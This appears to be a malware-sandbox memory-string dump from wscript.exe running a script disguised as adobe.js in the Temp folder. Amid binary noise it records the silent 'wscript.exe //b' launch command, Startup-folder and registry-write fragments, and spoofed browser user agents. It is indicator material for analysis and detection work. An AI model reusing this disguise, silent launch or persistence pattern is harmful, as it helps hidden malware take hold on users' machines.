Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell file system folder | memstr_b69a88cf-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user1796 | memstr_a6f0ca26-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: !("h" | memstr_2a700622-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c\users\userta | memstr_fcb5a9ac-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (!d! | memstr_01a76017-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\onedrive | memstr_c823c025-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft\windows\recent | memstr_74704a52-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft\windows\templates | memstr_a072ad40-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: serses | memstr_cbee1684-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c\users\userns | memstr_d6779ca1-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft\windows\sendto | memstr_d0d16c9b-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e,ede\e | memstr_c0f50dea-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e f8b\f? | memstr_95e3c647-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ]/qnn | memstr_e5c4236b-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: downloads | memstr_1f3502ec-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: downloadsd | memstr_4a399530-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .downloads | memstr_93a47152-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: onedriveb | memstr_a034add8-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .onedrive | memstr_8cd86cd7-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "false - 15/4/2025tringsop.ini | memstr_b9b94f84-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: swbemsecuritysetest2 | memstr_e06c501d-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %@%p% | memstr_284403c9-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\videos\desktop.inil | memstr_de698e37-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft\windows\printer shortcutsb | memstr_974858f8-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\onedrive\desktop.inik | memstr_a2d9cba3-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: }d"pn | memstr_ebafa85d-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\downloads9 | memstr_41142759-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming2 | memstr_98548ce4-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft\windows\network shortcuts% | memstr_568a3e4f-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.jssj | memstr_6a52b05a-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.jsn | memstr_8583668c-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.jsi | memstr_d1e6af91-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21770 | memstr_e28e12dd-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (non)standard marshaling for iwbemobjectsink2 | memstr_c38d7b9d-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource | memstr_e9d8cf98-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\program files (x86)\microsoft onedrive\onedrive.exe,1 | memstr_786663cb-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresourcec:\program files (x86)\microsoft onedrive\onedrive.exe,1 | memstr_b957b7c2-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s-tc:\users\user\appdata\local\temp\adobe.js | memstr_6e260bd3-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\favorites\desktop.ini | memstr_a0b69442-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.js | memstr_5c637ca7-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\ondemandconnroutehelper.dllx | memstr_2fc3c73b-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: js_sz | memstr_27d62e33-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adobeathsq | memstr_169525ba-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adobeell3k | memstr_c4994c22-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: common startuph | memstr_ec83464d-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adobeesp_ | memstr_4adf02a7-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\userp_ | memstr_3e337251-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: egreadl38 | memstr_913014d8-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adobe.js7 | memstr_bbf85663-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 15hoods | memstr_22ea8636-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progr | memstr_e8ff0a9c-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: program@ | memstr_eac790d4-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: indows | memstr_1229041e-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: indows@ | memstr_09832748-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup | memstr_7a155e3e-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startuph | memstr_6551acd4-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup@shell32.dll,-21787 | memstr_05455745-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $\rmio | memstr_dc7ecdd6-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sers\jon`#8 | memstr_66e8a516-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.jschine\software\adobe\". | memstr_2321f2d9-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup\desktop.ini | memstr_1b7e37ba-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\adobe\". | memstr_d4b3578e-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts | memstr_a183a61a-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe( | memstr_5e6eb6e8-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sers\jon@"8 | memstr_66375936-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.js | memstr_4e941cd5-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe | memstr_60c992c8-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: jc:\windows\system32\wbem\wbemdisp.tlb | memstr_1f50c967-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \windows\printer | memstr_5f6924b1-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"k | memstr_31f754a7-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \rxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"ssesa | memstr_ac4af16e-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $]rmic | memstr_0a36fcb4-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"programs | memstr_a0e86b37-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\desktop.ini; | memstr_b6807b51-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"tcuts1 | memstr_86d80e63-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs | memstr_c0456120-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %utc:\users\user\appdata\local\temp\adobe.jstar menu\p | memstr_625355d3-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: roft | memstr_f66c286c-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts | memstr_efcd9c9f-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ~1gzet | memstr_467e82c0-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: desktop@shell32.dll,-21769 | memstr_d8a4b684-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: micros~1 | memstr_0f288a23-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: micros~1d | memstr_630b795f-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pr1microsoft | memstr_fee02dc7-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v1gzct | memstr_5b2295d6-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cwindows | memstr_df668f9a-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: printe~1 | memstr_40c41996-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: printe~1t | memstr_2dd34b7a-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: printer shortcuts | memstr_87ba3855-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: templa~1 | memstr_d6829948-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: templa~1d | memstr_95775068-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: networ~1 | memstr_9e265734-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: networ~1t | memstr_311d4e05-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: network shortcuts | memstr_765a7e95-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1 | memstr_46fede26-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1n | memstr_c933d747-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [localizedfilenames | memstr_cedecfa1-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: onedrive.lnkonedrive | memstr_ee69b300-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21782 | memstr_b7ed74dd-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: immersive control panel.lnk@%systemroot%\immersivecontrolpanel\systemsettings.exe,-650 | memstr_4ff982f6-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progra~3hu | memstr_2ac1ea08-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell3 | memstr_cd350825-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cros~1 | memstr_2870e8de-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cros~1di | memstr_aacf88d0-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rogram | memstr_01549c69-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: start menu@shell32.dll,-2 | memstr_4474c25e-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\documents. | memstr_6d17ca7b-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "wshshell.regwritektopzmt. | memstr_d32fb8b9-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\ntmarta.dlll | memstr_0f785d1c-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\favorites | memstr_83dce664-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;?ones | memstr_62a97fb6-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appda | memstr_3c9bb946-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: favorites@shell32.dll,-21796 | memstr_2f584c8f-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1gzet | memstr_80de97a9-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: favori~1 | memstr_bcaed2ef-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: favori~1l | memstr_64299c55-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^gzet. | memstr_0256d790-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 202 (, | memstr_9094754a-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7t;h0h< | memstr_7b091645-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7$3t | memstr_b7157261-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0|2l#89 | memstr_562d9fab-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: )\8t* | memstr_af45a89d-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d7l4d= | memstr_b18b91fc-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8@1l$d= | memstr_ed2eb96b-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/4.0 (compatible; msie 8.0; windows phone os 7.5; trident/4.0; iemobile/8.0) | memstr_b0627150-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (compatible; msie 9.0; windows phone os 7.5; trident/5.0; iemobile/9.0) | memstr_4a283e6c-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l|v0[ | memstr_1bcf52e1-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rdj|i | memstr_a7da49f5-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [|utz | memstr_f20920c6-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: z\fdkxia | memstr_d7e3a750-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: elw`k | memstr_b6336139-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [tqpy | memstr_155611b3-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x@tx-<yds | memstr_309d11ff-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: j,x \ | memstr_08018211-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xdelz8& | memstr_e2fbc1a7-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: uodw0w`x | memstr_1900cf47-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @ @!@"@#@$@%@&@'@(@)@*@+@,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@[@\@]@^@_@`@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@{@|@}@~@ | memstr_1c2ae218-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/4.0 (compatible; msie 7.0; windows phone os 7.0; trident/3.1; iemobile/7.0) | memstr_2e2a5701-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/4.0 (compatible; msie 7.0; windows phone os 7.0; trident/3.1; iemobile/7.0)t | memstr_97ac5dde-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (compatible; msie 10.0; windows phone 8.0; trident/6.0; iemobile/10.0; arm; touch) | memstr_28326361-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (windows phone 8.1; arm; trident/8.0; touch; rv:11.0; iemobile/11.0) like gecko | memstr_6bd6bfae-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (windows phone 8.1; arm; trident/8.0; touch; rv:11.0; iemobile/11.0) like gecko2 | memstr_468c3ca8-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mozilla/5.0 (windows phone 10.0; android 6.0.1) applewebkit/537.36 (khtml, like gecko) chrome/70.0.3538.102 mobile safari/537.36 edge/18.19045 | memstr_e53349db-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t.@0n | memstr_2740ffcc-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: center2m32\wbem\wbemdisp.tlbh | memstr_4236d17f-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $8l`t | memstr_3ef8cef7-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0 t x | memstr_11a5da81-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: !0!p!p! | memstr_bb760d2f-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "8"`" | memstr_933353c5-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #@#l# | memstr_c1ded478-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $($h$l$ | memstr_4b2ce6da-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %d%p% | memstr_b01d062f-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &,&l&t& | memstr_589f4d42-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: & 'p'p' | memstr_bf9bd321-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: '( (@(l( | memstr_48c9f98c-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ($)h)l) | memstr_105dbf22-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *(*l*t* | memstr_69d957fd-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +<+h+ | memstr_299dcdbf-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +,0,x, | memstr_f0d0169b-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fax recipient.lnk@%systemroot%\system32\fxsresm.dll,-120 | memstr_8427faf9-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mail recipient.mapimail@sendmail.dll,-4 | memstr_80d900b0-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: desktop (create shortcut).desklink@sendmail.dll,-21 | memstr_cd468663-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: compressed (zipped) folder.zfsendtotarget@zipfldr.dll,-10148 | memstr_baa1a309-b |
